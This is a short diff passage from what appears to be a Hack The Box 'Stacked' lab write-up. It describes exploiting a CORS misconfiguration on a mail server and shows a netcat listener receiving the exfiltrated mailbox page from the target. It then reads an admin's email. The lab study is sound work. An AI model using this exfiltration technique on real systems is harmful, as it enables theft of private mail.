tgihf/writeups/htb/boxes/stacked/15 - HTTP portfolio.stacked.htb.md

 fullname=tgihf&email=tgihf%40stacked.htb&tel=111111111111&subject=Great+job!&message=Keep+up+the+good+work,+developing+nice,+secure+systems!
 ```

-It appears `http://mail.stacked.htb` does have a CORS misconfiguration after all, because the attack works perfectly.

 ```bash
 $ nc -nlvp 8000 > index.html
 listening on [any] 8000 ...
 connect to [10.10.14.61] from (UNKNOWN) [10.129.140.39] 56160
 ```

-The HTML source of `http://mail.stacked.htb` indicates it is the index page of an [AdminLTE](https://github.com/ColorlibHQ/AdminLTE) instance belonging to Adam Perkins.
+The HTML source of `http://mail.stacked.htb` indicates it is the index page of an [AdminLTE 3](https://github.com/ColorlibHQ/AdminLTE) instance belonging to Adam Perkins.
 Adam's mailbox shows two email messages, one from Jeremy Taint (subject: "S3 Instance Started") and one from the attacker.

 Jeremy's message is readable at `http://mail.stacked.htb/read-mail.php?id=1`.
 Modify and rerun the above exploit to retrieve this URL.